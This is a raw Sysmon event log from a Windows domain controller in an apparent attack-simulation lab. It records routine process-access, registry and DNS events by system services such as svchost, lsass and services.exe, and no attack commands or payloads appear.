13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801144C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:23.779{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801096C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801096C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001e) 13241300x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001e) 12241200x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30 13241300x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 22542200x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.432{59A5CD1D-8E22-6005-DD02-00000000A201}3540localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 13241300x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.402{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.402{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.404{59A5CD1D-8CA9-6005-1600-00000000A201}1528C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:24.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.996{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.975{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.975{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.973{59A5CD1D-8E44-6005-0A00-00000000A301}848936C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.964{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.960{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.960{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.945{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 